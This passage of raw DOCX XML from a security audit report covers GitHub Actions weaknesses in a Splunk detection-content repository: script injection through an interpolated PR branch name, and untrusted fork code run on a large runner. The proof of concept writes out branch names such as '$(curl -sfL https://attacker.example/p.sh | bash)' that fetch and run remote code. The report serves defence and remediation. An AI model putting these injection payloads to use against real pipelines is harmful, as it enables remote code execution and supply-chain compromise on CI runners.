        <w:t xml:space="preserve"> locally cannot merge unformatted/secret-bearing content; scope </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.yamllint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; reserve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--no-verify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for documented exceptions. Explanation: server-side required checks make local bypass harmless.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1120 (Excessive Code Complexity) — N/A; closest is CWE-1127 / process weakness; OWASP A05:2021 / A08:2021 (Software and Data Integrity Failures). ASVS v4 1.14 / 14.2. NIST 800-53 Rev5 SA-11, SA-15, CM-3. NIST CSF 2.0 PR.PS / GV.SC. ISO 27001:2022 A.8.25 (Secure development lifecycle), A.8.28. SANS/CERT: enforced CI gates. Best practice: server-side required status checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1127. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration, A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA-11 Developer Testing and Evaluation, SA-15 Development Process, Standards, and Tools, CM-3 Configuration Change Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security, GV.SC Govern - Cybersecurity Supply Chain Risk Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.25 Secure development life cycle, A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.5 CI/CD Pipeline and Build Scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This area produced 13 unique findings: 2 High, 2 Medium, 5 Low, 4 Informational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-01 — Script injection via github.head_ref interpolated into run: steps (unit-testing workflow)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 8.1). Exploitability: Conditionally exploitable (fork PR + run approval; RCE on runner, no fork secrets).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/unit-testing.yml:26,50 (also 25,51,77)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>26:            echo "The PR head branch is: ${{ github.head_ref }}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>50:            echo "Current Branch (Head Ref): ${{ github.head_ref }}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> steps paste </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>${{ github.head_ref }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directly into the shell script that GitHub Actions generates. Actions expression interpolation happens </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the shell sees the line, so the branch name is spliced into the script body as literal text, not as a shell variable. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>github.head_ref</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the head branch name of the PR and is fully controlled by the PR author on a fork PR. Git permits branch names containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and backticks (confirmed: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git check-ref-format --branch 'feature/$(whoami)'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> both pass; only a bare </w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> is rejected). An attacker opens a fork PR from a branch named e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>curl -sL https://evil/x|bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:t>$(curl -sL https://evil/x|bash)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> and when line 26/50 executes, the command substitution runs on the runner. **Untrusted-input reachability**: Source = PR head branch name (fork contributor) → </w:t>
      </w:r>
      <w:r>
        <w:t>github.head_ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> → interpolated into </w:t>
      </w:r>
      <w:r>
        <w:t>run:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell body → command execution. Preconditions: a fork PR whose path filter matches (</w:t>
      </w:r>
      <w:r>
        <w:t>data_sources/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`, `detections/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>lookups/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`, `macros/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>install.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) and whose workflow run is approved. GitHub by default requires maintainer approval to run </w:t>
      </w:r>
      <w:r>
        <w:t>pull_request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> workflows for first-time/outside contributors; maintainers routinely approve content PRs. Secrets (</w:t>
      </w:r>
      <w:r>
        <w:t>APPINSPECTUSERNAME/PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) are **not** delivered to fork-PR runs and </w:t>
      </w:r>
      <w:r>
        <w:t>GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> is read-only there, so this is not direct secret theft — but it is arbitrary code execution on the job runner (which also builds images, has network egress, and uploads artifacts). On a self-hosted / large persistent runner class (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">large-ubuntu-22.04-32core`) the blast radius is larger than an ephemeral GitHub-hosted runner (possible runner persistence, cache/artifact poisoning for later jobs). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (fork PR + run approval; RCE in job, no direct secret exfil on fork runs). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (not executed against infra — safe static demonstration): malicious fork branch name:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$(curl -sfL https://attacker.example/p.sh | bash)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>After GitHub renders line 26 the runner executes literally:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>echo "The PR head branch is: $(curl -sfL https://attacker.example/p.sh | bash)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Local confirmation that such a name is a legal git branch:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ git check-ref-format --branch 'feature/$(whoami)'  -&gt; prints the name (exit 0 = ACCEPTED)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ git check-ref-format --branch '`id`'               -&gt; ACCEPTED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: never interpolate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>github.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Pass through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>env:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (quoted) and reference the shell variable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- name: Print out information about PR target</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env:</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HEAD_REF: ${{ github.head_ref }}</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BASE_REF: ${{ github.base_ref }}</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run: |</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echo "The PR target branch is: ${BASE_REF}"</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echo "The PR head branch is:   ${HEAD_REF}"</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git branch --show-current</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git rev-parse HEAD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>env:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the value is placed in the process environment and the shell expands </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>${HEAD_REF}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as data, so metacharacters are never parsed as code. Do the same for line 50 and for line 77's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--git-ref ${{ github.base_ref }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--git-ref "${BASE_REF}"</w:t>
      </w:r>
      <w:r>
        <w:t>). Functionality is unchanged — the same string is printed/passed, just not evaluated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-78 OS Command Injection (2024 CWE Top 25 #7); CWE-94 Improper Control of Generation of Code (Code Injection) (2024 CWE Top 25 #11). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059 Command and Scripting Interpreter, T1195.002 Supply Chain Compromise: Compromise Software Supply Chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, CM-3 Configuration Change Control, SA-15 Development Process, Standards, and Tools. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security, DE.CM Detect - Continuous Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding, A.8.31 Separation of development, test and production environments. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-02 — Untrusted fork-PR code built and executed on a large runner; PR-built artifacts uploaded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 8.1). Exploitability: Conditionally exploitable (defence-in-depth).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/unit-testing.yml:44-88</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>54:            git fetch origin pull/${{ github.event.pull_request.number }}/head:new_branch_for_testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>56:            git switch new_branch_for_testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>60:            contentctl-ng build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>77:            contentctl-ng test --verbose --post-test-behavior NEVER_PAUSE --mode CHANGED --git-ref ${{ github.base_ref }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The job intentionally fetches the PR head (including fork PRs) and runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over that content. Detection YAML carries SPL searches and the build/test pipeline processes attacker-authored files; combined with CI-01 the runner executes untrusted input. The job runs on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>large-ubuntu-22.04-32core</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (line 13) — a non-default, higher-resource runner class. It also starts a Docker container and uploads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dist/*.tar.gz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>test_results/summary.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as artifacts (lines 81-88) built from PR content (artifact poisoning: a later consumer that downloads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>content-latest</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>test_summary_results</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ingests attacker-influenced bytes). </w:t>
      </w:r>
